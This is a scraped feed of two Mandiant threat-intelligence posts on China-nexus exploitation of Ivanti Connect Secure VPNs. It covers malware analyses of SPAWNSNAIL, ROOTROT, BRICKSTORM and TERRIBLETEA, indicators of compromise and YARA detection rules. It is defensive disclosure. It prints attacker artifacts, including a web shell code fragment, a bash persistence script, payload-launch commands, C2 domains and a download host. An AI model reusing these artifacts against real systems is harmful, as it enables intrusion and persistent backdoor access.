The material in this blog post is being shared as cyber threat indicators and defensive measures solely for cybersecurity purposes in accordance with the Cybersecurity Information Sharing Act of 2015 (&ldquo;CISA/2015&rdquo;).&nbsp; This information is subject to the provisions of CISA/2015, including&nbsp;6 U.S. Code &sect; 1504(d)(1).
Indicators of Compromise (IOCs)
Host-Based Indicators (HBIs)



















Filename


MD5


Description






DSUserAgentCap.pm


e4fe3a314a3aee5aee9c55787a33671c


BUSHWALK activator / deactivator




querymanifest.cgi


e48716521dc48425feae71bc9dc768cd


BUSHWALK variant




diskCounters


8c4b32e8ee9e0b2f8dab01364971ffff


Dropper for DSUserAgentCap.pm




diskmonitor


e33a3a90f1f8fa6d8f17bc6151b027d6


Encrypted DSUserAgentCap.pm




diskAnalysis


6c58b8b1e3b36a5a124afd110c109ebc


Encrypted BUSHWALK variant




plugin.jar


b76d7890a7a7ff6d0b1151a8251e318f


PITFUEL SparkGateway plugin




gateway.conf


9e0941c4851d414b5d25dd15872c3e47


SparkGateway config to load PITFUEL




libchilkat.so


fd83b3e9db57838b62c5baf8218ce5a8


LITTLELAMB.WOOLTEA backdoor




libaprhelper.so


2ddeca6511506fe435dc1f63b4cf061c


PITSOCK backdoor




security.jar


f64a799ff16aded3f4d6706ffbd7e6dd


PITDOG SparkGateway plugin




gateway.conf


fb973c8bbfdba234ea83ee20084dcac9


SparkGateway config to load PITDOG




mem.rd


5368b1122c10fa7850f44d3e16fc18fb


PITHOOK backdoor




memorysCounter


31a591a28198f05e9ab4d12609a9ce81


Kubo Injector




dsAgent


5f561f217a8046de8cadf418ef4dfda0


PITSTOP backdoor




wd.fd


N/A


Unix domain socket for PITSTOP




wd.lock


N/A


Mutex for PITSTOP


















Table 3: Host-based indicators
YARA Rules

rule M_Launcher_PITDOG_1 {
  meta:
    author = &quot;Mandiant&quot;
    description = &quot;This rule is designed to detect on events 
related to PITDOG.&quot;
	strings:
		$str2 = &quot;cat /proc/%d/maps | grep mem.rd&quot;
		$str3 = &quot;/data/runtime/cockpit/memorysCounter 
-p %d /data/runtime/cockpit/mem.rd&quot;
		$str4 = &quot;rm -f /data/runtime/cockpit/wd.lock&quot;
		$str5 = &quot;/data/runtime/cockpit/dsAgent&quot;
		$str6 = &quot;watchdog&quot;
		$str7 = &quot;ps aux|grep &#039;/home/bin/web&#039;|grep -v grep 
| awk &#039;{if (NR!=1) {print $2}}&#039;&quot;
condition:
	uint32(0) == 0xBEBAFECA and all of them
}

rule M_Utility_PITHOOK_1 {
  meta:
    author = &quot; Mandiant&quot;
    description = &quot;This rule is designed to detect on events 
related to PITHOOK.&quot;
	strings:
		$str1 = &quot;/data/runtime/cockpit/wd.fd&quot;
		$str2 = &quot;/proc/self/maps&quot;
		$str3 = &quot;plthook_open&quot;
		$str4 = &quot;plthook_replace&quot;
		$str5 = &quot;plthook_close&quot;
		$str6 = &quot;plthook_open_by_handle&quot;
		$str7 = &quot;plthook_open_by_address&quot;
		$str8 = &quot;plthook_enum&quot;
		$str9 = &quot;plthook_error&quot;
		$str10 = &quot;accept4_hook&quot;
	condition:
		uint32(0) == 0x464C457F and all of them
}

rule M_Hunting_Webshell_BUSHWALK_1 {
  meta:
    author = &quot;Mandiant&quot;
    description = &quot;This rule detects BUSHWALK, a webshell 
written in Perl CGI that is embedded into a legitimate 
Pulse Secure file to enable file transfers&quot;
  strings:
    $s1 = &quot;SafariiOS&quot; ascii
    $s2 = &quot;command&quot; ascii
    $s3 = &quot;change&quot; ascii
    $s4 = &quot;update&quot; ascii
    $s5 = &quot;$data = RC4($key, $data);&quot; ascii
  condition:
    filesize &lt; 5KB
    and all of them
}

rule M_Hunting_Launcher_PITFUEL_1 {
    meta:
		author = &quot;Mandiant&quot;
		description = &quot;This rule detects class used in 
PITFUEL, a malicious JAR-based launcher that loads malicious code&quot;
	strings:
		$h1 = {50 4B 03 04}
		$s1 = &quot;com/toremote/gateway/plugin/PluginManager.class&quot;
	condition:
		$h1 at 0 and for any i in (0..#h1): ($s1 in (@h1[i]..@h1[i]+80))
}

Mandiant Security Validation Actions
Organizations can validate their security controls using the following actions with&nbsp;Mandiant Security Validation.


















VID


Name




A106-935


Application Vulnerability - CVE-2023-46805, Authentication Bypass, Variant #1




A106-934


Application Vulnerability - CVE-2024-21887, Command Injection, Variant #1




A106-936


Application Vulnerability - CVE-2024-21887, Command Injection, Variant #2




A106-986


Application Vulnerability - CVE-2024-21893, Exploitation, Variant #1




A107-055


Application Vulnerability - CVE-2024-22024, Exploitation, Variant #1




A107-060


Malicious File Transfer - BUSHWALK, Download, Variant #1

















 ]]></description>
<link>https://tsecurity.de/de/3578877/IT+Sicherheit/Cybersecurity+Nachrichten/Cutting+Edge%2C+Part+3%3A+Investigating+Ivanti+Connect+Secure+VPN+Exploitation+and+Persistence+Attempts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578877/IT+Sicherheit/Cybersecurity+Nachrichten/Cutting+Edge%2C+Part+3%3A+Investigating+Ivanti+Connect+Secure+VPN+Exploitation+and+Persistence+Attempts/</guid>
<pubDate>Tue, 27 Feb 2024 01:00:00 +0100</pubDate>
</item>
<item> 
<title><![CDATA[Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies]]></title> 
<description><![CDATA[Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan

&nbsp;
Since the initial disclosure of CVE-2023-46805 and CVE-2024-21887 on Jan. 10, 2024, Mandiant has conducted multiple incident response engagements across a range of industry verticals and geographic regions. Mandiant&#039;s previous blog post, Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus espionage actor that Mandiant tracks as UNC5325.&nbsp;
This blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types of activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did not have the appropriate mitigation applied.&nbsp;
Mandiant has observed different types of post-exploitation activity across our incident response engagements, including lateral movement supported by the deployment of open-source tooling and custom malware families. In addition, we&#039;ve seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by abusing appliance-specific functionality to achieve their objectives.
As of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by the vulnerabilities. We recommend that customers follow Ivanti&#039;s latest patching guidance and instructions to prevent further exploitation activity. In addition, Ivanti released a new enhanced external integrity checker tool (ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other tactics, techniques, and procedures (TTPs) observed in the wild. We also released a remediation and hardening guide, which includes recommendations.
Mandiant recommends customers run both the internal and the latest external ICT released alongside a new patch on April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge Ivanti for their collaboration, transparency, and ongoing support throughout this process.
Clustering and Attribution
Mandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893 across our incident response investigations. In addition to suspected China-nexus espionage groups, Mandiant has also identified financially motivated actors exploiting CVE-2023-46805 and CVE-2024-21887, likely to enable operations such as crypto-mining. Since the public disclosure on Jan. 10, 2024, Mandiant has observed eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are highlighting five China-nexus clusters that have conducted intrusions.&nbsp;
In February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium confidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix Netscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however Mandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.
UNC5221
UNC5221 is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our previous blog post, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887 following the public disclosure on Jan. 10, 2024.
UNC5266
Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox&#039;s SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.&nbsp;
UNC5330
UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence.
Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021.&nbsp;
UNC5337
UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221.&nbsp;
UNC5291
UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access.
New TTPs and Malware
Since our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain access to target environments and move laterally within them. Additionally, Mandiant has identified several new code families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these code families, several are assessed to be custom malware families; however, Mandiant has also identified the use of open-source tooling, such as SLIVER and CrackMapExec.
SPAWN Malware Family
During analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four distinct malware families that work closely together to create a stealthy and persistent backdoor on an infected appliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid detection.&nbsp;
Figure 1 illustrates how the SPAWN malware family operates.







  
    
      
  

    

      
      
        
        
        
        
      
        Figure 1: SPAWN malware family diagram
      
    

  
      
    
  





SPAWNANT
SPAWNANT is an installer that leverages a coreboot installer function to establish persistence for the SPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate dspkginstall installer process and exports an sprintf function adding a malicious code to it before redirecting a flow back to vsnprintf.
SPAWNMOLE
SPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor.


The malware attempts to inject itself into a process named web.


The malware attempts to hijack the accept API from the libc binary within web process.


The malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.


The malware traffic must start with a header that contains 0xfb49e3e2 at offset 0x13 and 0x1bc38361 at offset 0x1b of the received buffer.


SPAWNSNAIL
SPAWNSNAIL (libdsmeeting.so) is a backdoor that listens on localhost. It is designed to run by injecting into the dsmdm process (process responsible for supporting mobile device management features). It creates a backdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the SPAWNMOLE tunneler to interact with SPAWNSNAIL.
SPAWNSNAIL&#039;s second purpose is to inject SPAWNSLOTH (.liblogblock.so) into dslogserver, a process supporting event logging on Connect Secure.
SPAWNSNAIL checks if its binary name is dsmdm; if it is running under that name, it creates two threads:


First thread drops a hard-coded SSH host private key to /tmp/.dskey, configures libssh to use the key, and then deletes /tmp/.dskey. The malware binds to localhost on port 8300.



The SSH server requires public key authentication.


When starting an interactive shell session, the malware prints a banner with statistics about the system. It will print the information about the release, uptime, current time, and whether SELinux is enabled. SPAWNSNAIL then executes an interactive bash shell.



The second thread injects a log tampering utility, SPAWNSLOTH (/tmp/.liblogblock.so), into the dslogserver process up to three times.


SPAWNSLOTH
SPAWNSLOTH is a log tampering utility injected into the dslogserver process. It can disable logging and disable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.
SPAWNSLOTH uses funchook to hook the _ZN5DSLog4File3addEPKci function (it is assumed to be a logging function of dslogserver). It also modifies the g_do_syslog_servers_exist_p symbol. This is a pointer to a global variable controlling if event logs should be forwarded to an external syslog server.
Finally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL backdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.
Getting to the Root of It
During the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a new web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a legitimate Connect Secure .ttc file located at /data/runtime/tmp/tt/setcookie.thtml.ttc by exploiting CVE-2023-46805 and CVE-2024-21887. setcookie.thtml.ttc is located on a writable partition on the appliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving CVE-2019-11539 and CVE-2020-8218.
Figure 2 shows the code inserted into the setcookie.thmtl.ttc file that contains ROOTROT. The web shell can be accessed at /dana-na/auth/setcookie.cgi. It parses the issued decoded Base64-encoded command and executes it with eval.&nbsp;
   $output .=  &quot;\n\n\n&quot;;
        $output .= &quot;\n&quot;;
        } };
        if ($@) {
            $error = $context-&gt;catch($@, \$output);
            die $error unless $error-&gt;type eq &#039;return&#039;;
        }
    
        return $output;
    },
Figure 2: Code block inserted into the setcookie.thtml.ttc file
During the investigation, Mandiant identified that the web shell was created on the system prior to the public disclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the presence of ROOTROT by the existence of&nbsp; \n at the end of the response from /dana-na/auth/setcookie.cgi.&nbsp;
As of April 3, 2024, the latest external ICT will detect modifications to setcookie.thtml.ttc.
Lateral Movement Leading to vCenter Compromise
Once UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated network reconnaissance against the victim&#039;s network and moved laterally to a VMware vCenter server. Mandiant identified that UNC5221 first moved laterally using the vCenter web console, then later using SSH.&nbsp;
After moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter, utilizing a naming convention consistent with other servers in the environment. Though the virtual machine creation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual machine.
Following this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM backdoor to the appliance (/home/vsphere-ui/vcli). Notably, BRICKSTORM appears to masquerade as a legitimate vCenter process, vami-http.&nbsp;
BRICKSTORM
BRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded C2.
Upon execution, BRICKSTORM checks for an environment variable, WRITE_LOG, to determine if the file needs to be executed as a child process. If the variable returns false or is unset, it will copy the BRICKSTORM sample from /home/vsphere-ui/vcli to /opt/vmware/sbin as vami-httpd. It will then execute the copied BRICKSTORM sample and terminate execution.
&nbsp;If WRITE_LOG is set to true, it assumes it is running as the correct process, deletes /opt/vmware/sbin/vami-httpd, and continues execution.
BRICKSTORM contains a separate function called Watcher, which contains self-monitoring functionality. If the environment variable WORKER returns false or is unset, it will continue the monitoring, checking for the file /home/vsphere-ui/vcli and copying the contents over to /opt/vmware/sbin/vami-httpd. Then, it sets the appropriate environment variables and spawns the process. The watcher process then begins monitoring the exit status of the child process.
If it finds the environment variable WORKER is set to true, it assumes it is a spawned worker process meant to execute the backdoor functionality and skips the remainder of the Watcher function.
BRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket address of&nbsp; wss://opra1.oprawh.workers[.]dev. Additionally, it contains the following legitimate DNS over HTTPS (DoH) addresses.
https://9.9.9.9/dns-query
https://45.90.28.160/dns-query
https://45.90.30.160/dns-query
https://149.112.112.112/dns-query
https://9.9.9.11/dns-query
https://1.1.1.1/dns-query
https://1.0.0.1/dns-query
https://8.8.8.8/dns-query
https://8.8.4.4/dns-query
Figure 3: DNS over HTTPS addresses
BRICKSTORM appears to leverage a custom Go package called wssoft. There is no known, publicly available Go package with this name. It appears this may be the main package developed by the malware authors to perform task processing and connection handling for the malware.
Table 1 provides the four core functions provided by wssoft.














Function


Comments




Spawning a web server


See below for accepted routes/endpoints




Command execution


Executes shell commands using /bin/sh




Command execution (&ldquo;NoContext&rdquo;)


Executes shell commands using calls to os. Exec
likely accepts commands run_shell and exit




SOCKS relaying


Connection proxying














Table 1: wssoft capabilities
When the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses Gorilla/mux to handle the endpoint routing and lonnng/nex to marshal the data into JSON.
Table 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.














Endpoint


Function




/api/file/change-dir


Change directory




/api/file/delete-dir


Deletes a directory




/api/file/delete-file


Deletes a file




/api/file/mkdir


Makes a directory (create subdirectories as necessary)




/api/file/list-dir


Lists directory contents




/api/file/rename


Renames a file




/api/file/put-file


File upload given a destination path, can optionally append to file




/api/file/get-file


File download




/api/file/slice-up


May upload large files in separate chunks




/api/file/file-md5


Calculates file MD5




/api/file/up


Uploads a file using a web form (includes SHA256 hashing)




/api/file/stat


Gets file information














Table 2: BRICKSTORM endpoints
Lateral Movement Leading to Active Directory Compromise
UNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887, a tactic outlined in Cutting Edge Part 3. Shortly after gaining access, UNC5330 leveraged an LDAP bind account configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows Certificate Template, created a computer object, and requested a certificate for a domain administrator. The threat actor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential material to move laterally.
Attack Path Diagram







  
    
      
  

    

      
      
        
        
        
        
      
        Figure 4: UNC5330 attack path diagram
      
    

  
      
    
  





Windows Certificate Template Abuse&nbsp;
UNC5330 used the ldap-ivanti account, configured on the Ivanti appliance for LDAP bind operations, to create a domain computer object, testComputer$. UNC5330 used the newly created testComputer$ computer object to request a certificate from a vulnerable certificate template that provided enrollment rights to Domain Computers. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using the certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral movement.
Once domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the PHANTOMNET backdoor.
WMI Event Consumers
WMI was used to perform lateral movement and establish persistence within the victim environment, primarily by creating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers performed the following:


Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute command with cmd.exe.


Wrote command output to a .log file in C:\Windows\Temp.


Deleted the scheduled task.


The behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with a recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB. Mandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.
TONERJAM
TONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects depending on the permissions granted to it upon execution.
PHANTOMNET
PHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP. PHANTOMNET&#039;s core functionality involves expanding its capabilities through a plugin management system. The downloaded plugins are mapped directly into memory and executed.
SLIVER C2
During a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on the same IP address as the configured command-and-control server. The copies of SLIVER were placed in three separate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266 modified a systemd service file to register one of the copies of SLIVER as a persistent daemon.














Path


Description




/home/bin/netmon


SLIVER




/home/bin/logd


SLIVER




/home/runtime/logd


SLIVER




/home/config/logd.spec.cfg


systemd service unit configuration file














Table 3: SLIVER components
Additionally, UNC5266 leveraged a WARPWIRE variant previously reported in Cutting Edge, Part 2. This variant was downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda. See Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.
TERRIBLETEA
At a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation. However, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA. During this intrusion, the actor attempted to use curl to download the backdoor; however, logs suggest these attempts failed. Seven minutes after their last failed curl attempt, UNC5266 ran a wget request to an anonymous file sharing site: pan.xj.hk. UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in the intervening seven minutes.
TERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It is built using multiple open-source Go modules and has a multitude of capabilities including:


Command execution


Keystroke logging


SOCKS5 proxy


Port scanning


File system interaction


SQL query execution


Screen captures


Ability to open a new SSH session, execute commands, and upload files to a remote server. The following commands may be executed:



chmod +x /tmp/.udevd


/tmp/.udevd 


ls -lahrt /home/



TERRIBLETEA can take different execution paths depending on what environment it is configured for, either linux_amd64 or darwin_amd64. In this instance, TERRIBLETEA is configured for the linux_amd64 environment. The sample persists with a Bash profile script located at /etc/profile.d/cron.sh for persistence.
# Initialization script for bash and sh
# export AFS if you are in AFS environment
a=`ps -fe|grep /bin/cron |grep -v grep|wc|awk &#039;{print$1}&#039;`
if [ &quot;$a&quot; -eq 0 ] 
then
/bin/cron
fi
Figure 5: TERRIBLETEA Bash profile script
Outlook and Implications
The activity detailed in this blog, as well as the recently published Cutting Edge, Part 3 highlighting UNC5325 targeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues to observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their operations and target organizations across the globe.&nbsp;
Mandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities against edge appliances. As previously reported by Mandiant, China-nexus actors continue to evolve their stealth to avoid detection by defenders. While the use of open--source tooling is somewhat common, Mandiant continues to observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.
Indicators of Compromise (IOCs)
Host-Based Indicators (HBIs)













Filename


MD5


Description






data.dat


9d684815bc96508b99e6302e253bc292


PHANTOMNET




epdevmgr.dll


b210a9a9f3587894e5a0f225b3a6519f


TONERJAM




libdsproxy.so


4f79c70cce4207d0ad57a339a9c7f43c


SPAWNMOLE




libdsmeeting.so


e7d24813535f74187db31d4114f607a1


SPAWNSNAIL




.liblogblock.so


4acfc5df7f24c2354384f7449280d9e0&nbsp;


SPAWNSLOTH




.dskey


3ef30bc3a7e4f5251d8c6e1d3825612d


SPAWNSNAIL private key




N/A


bb3b286f88728060c80ea65993576ef8


TERRIBLETEA




N/A


cfca610934b271c26437c4ce891bad00


TERRIBLETEA




N/A


08a817e0ae51a7b4a44bc6717143f9c2


TERRIBLETEA




linb64.png


e7fdbed34f99c05bb5861910ca4cc994


SLIVER




lint64.png


c251afe252744116219f885980f2caea


SLIVER




linb64.png


4f68862d3170abd510acd5c500e43548


SLIVER




lint64.png


9d0b6276cbc4c8b63c269e1ddc145008


SLIVER




logd


71b4368ef2d91d49820c5b91f33179cb


SLIVER




winb64.png


d88bbed726d79124535e8f4d7de5592e


SLIVER




logd.spec.cfg


846369b3a3d4536008a6e1b92ed09549


SLIVER persistence




N/A


8e429d919e7585de33ea9d7bb29bc86b


SLIVER downloader




N/A


fc1a8f73010f401d6e95a42889f99028


PHANTOMNET




N/A


e72efc0753e6386fbca0a500836a566e


PHANTOMNET




N/A


4645f2f6800bc654d5fa812237896b00


BRICKSTORM













Table 4: Host-based indicators
Network-Based Indicators (NBIs)













Network Indicator


Type


Description






8.218.240[.]85


IPv4


Post-exploitation activity




98.142.138[.]21


IPv4


Post-exploitation activity




103.13.28[.]40


IPv4


Post-exploitation activity




103.27.110[.]83


IPv4


Post-exploitation activity




103.73.66[.]37


IPv4


Post-exploitation activity




193.149.129[.]191


IPv4


Post-exploitation activity




206.188.196[.]199


IPv4


Post-exploitation activity




oast[.]fun


Domain


Pre-exploitation validation




cpanel.netbar[.]org


Domain


WARPWIRE Variant C2 server




pan.xj[.]hk


Domain


Post-exploitation activity




akapush.us[.]to


Domain


SLIVER C2 server




opra1.oprawh.workers.dev


Domain


BRICKSTORM C2 server













Table 5: Network-based indicators
YARA Rules
rule M_Hunting_Webshell_ROOTROT_1 {
  meta:
    author = &quot;Mandiant&quot;
    description = &quot;This rule detects ROOTROT, a web shell written in 
Perl that is embedded into a legitimate Pulse Secure .ttc file to 
enable arbitrary command execution.&quot;
    md5 = &quot;c7ffd2c06e9b7e8e0b7ac92a0dbe3294&quot;
  strings:
    $s1 = &quot;use MIME::Base64&quot; ascii
    $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73 
65 36 34 28 22 24 6b 65 79 22 29}
    $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e 
22 3b}
    $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e 
5c 6e 22}
  condition:
    filesize &lt; 4KB
    and all of them
}

rule M_Hunting_Backdoor_BRICKSTORM_1 {
  meta:
    author = &quot;Mandiant&quot;
    created = &quot;2024-01-30&quot;
    md5 = &quot;4645f2f6800bc654d5fa812237896b00&quot;
    descr = &quot;Hunting rule looking for BRICKSTORM golang backdoor samples&quot;
  strings:
    $v1 = &quot;/home/vsphere-ui/vcli&quot; ascii wide
    $v2 = &quot;/opt/vmware/sbin&quot; ascii wide
    $v3 = &quot;/opt/vmware/sbin/vami-httpd&quot; ascii wide
    $s1 = &quot;github.com/gorilla/mux&quot; ascii wide
    $s2 = &quot;WRITE_LOG=true&quot; ascii wide
    $s3 = &quot;wssoft&quot; ascii wide
    
  condition:
    uint32(0) == 0x464c457f and filesize &lt; 6MB and 1 of ($v*) and 2 of ($s*)
}
import &quot;pe&quot;
rule M_APT_Backdoor_Win_PHANTOMNET_1
{
    meta:
        author = &quot;Mandiant&quot;
        md5 = &quot;59f4d38a5caafbc94673c6d488bf37e3&quot;

    strings:
        $phantomnet = /\\PhantomNet-\w{1,10}\.pdb/ ascii nocase
    condition:
        (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) 
and all of them
}

rule M_APT_Backdoor_SLIVER_1
{
    meta:
        Author = &ldquo;Mandiant&rdquo;
        description = &quot;Detects Windows, MacOS and ELF variants 
of the Sliver implant framework&quot;
        md5 = &quot;5ecd0c38501dfb02b682cec0a2d93aa9&quot;

    strings:
        $s1 = &quot;.InvokeSpawnDllReq&quot;
        $s2 = &quot;.(*InvokeSpawnDllReq).Reset&quot;
        $s3 = &quot;.(*InvokeSpawnDllReq).ProtoMessage&quot;
        $s4 = &quot;.(*InvokeSpawnDllReq).ProtoReflect&quot;
        $s5 = &quot;.(*InvokeSpawnDllReq).Descriptor&quot;
        $s6 = &quot;.(*InvokeSpawnDllReq).GetData&quot;
        $s7 = &quot;.(*InvokeSpawnDllReq).GetProcessName&quot;
        $s8 = &quot;.(*InvokeSpawnDllReq).GetArgs&quot;
        $s10 = &quot;.(*InvokeSpawnDllReq).GetKill&quot;
        $s11 = &quot;.(*InvokeSpawnDllReq).GetPPid&quot;
        $s12 = &quot;.(*InvokeSpawnDllReq).GetProcessArgs&quot;
        $s13 = &quot;.(*InvokeSpawnDllReq).GetRequest&quot;
        $s14 = &quot;.(*InvokeSpawnDllReq).String&quot;
        $s15 = &quot;.(*InvokeSpawnDllReq).GetEntryPoint&quot;

    condition:
        ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) 
or uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0) 
== 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE)) 
and 5 of ($s*)
}

rule M_APT_Backdoor_TERRIBLETEA_1 {
    meta:
        author = &quot;Mandiant&quot;
        description = &quot;This rule is designed to detect on events related 
to terribletea. TERRIBLETEA is a backdoor written in Go that communicates 
over HTTP. Its many capabilities include shell command execution, 
capturing screens, keystroke logging, port scanning, enumerating files, 
starting a SOCKS5 proxy and new SSH session, downloading files, and 
executing SQL queries.&quot;
        md5 = &quot;bb3b286f88728060c80ea65993576ef8&quot;
    
    strings:
        $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E 
[1-12] 80 7B ?? 64}
        $code_get_task = { 48 8D  [5] B9 04 00 00 00 48 8B ?? 24 [4] 48 
8D [5] 41 B8 03 00 00 00 E8}
        $func1 = &quot;SendRequest&quot; fullword
        $func2 =&quot;UploadResult&quot;
        $func3 =&quot;Online&quot;
        $func4 =&quot;GetCommond&quot;
    condition:
        all of ($code*) and any of ($func*) and filesize ]]></description>
<link>https://tsecurity.de/de/3578869/IT+Sicherheit/Cybersecurity+Nachrichten/Cutting+Edge%2C+Part+4%3A+Ivanti+Connect+Secure+VPN+Post-Exploitation+Lateral+Movement+Case+Studies/</link>
